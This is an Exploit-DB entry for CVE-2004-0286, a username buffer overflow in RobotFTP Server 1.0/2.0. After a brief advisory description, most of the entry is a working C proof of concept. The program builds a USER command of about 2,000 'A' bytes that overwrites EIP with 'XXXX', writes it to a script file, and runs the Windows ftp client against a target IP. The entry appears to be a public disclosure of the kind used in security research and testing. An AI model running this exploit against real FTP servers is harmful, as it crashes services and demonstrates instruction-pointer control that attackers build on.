RobotFTP Server 1.0/2.0 - Username Buffer Overflow Vulnerability 1

2004-02-16T00:00:00
ID EDB-ID:23708
Type exploitdb
Reporter gsicht
Modified 2004-02-16T00:00:00

Description

RobotFTP Server 1.0/2.0 Username Buffer Overflow Vulnerability (1). CVE-2004-0286. Dos exploit for windows platform

                                        
                                            source: http://www.securityfocus.com/bid/9672/info

A vulnerability has been reported for RobotFTP Server. The problem likely occurs due to insufficient bounds checking when processing 'USER' command arguments of excessive length.

/******************************
this is example code for the vulnerability. It uses the windows ftp client to connect to a server
******************************/
#include <stdio.h>

char buffer[2500];
char cmd[50];

int main(int argc, char *argv[])
{
        FILE *evil;

        if(argv[1] == NULL)
        {
                printf("Usage: %s [IP]\n\n",argv[0]);
                return 0;
        }

        memset(buffer,0x41,47);
        memcpy(buffer+47,"\r\n",2);
        memcpy(buffer+49,"crash",5);
        memcpy(buffer+54,"\r\n",2);
        memcpy(buffer+56,"USER ",5);
        memset(buffer+61,0x41,1989);
        memset(buffer+61+1989,0x58,4);  // << overwrites the eip with XXXX
        memcpy(buffer+65+1989,"\r\n",2);

        sprintf(cmd,"ftp -s:ftp.txt %s",argv[1]);


        if((evil = fopen("ftp.txt", "a+")) != NULL)
        {
                fputs(buffer, evil);
                fclose(evil);
                printf("- file written!\n");
        }
        else
        {
                fprintf(stderr, "ERROR: couldn't open ftp.txt!\n");
                exit(1);
        }
        system(cmd);

}
/*******************************/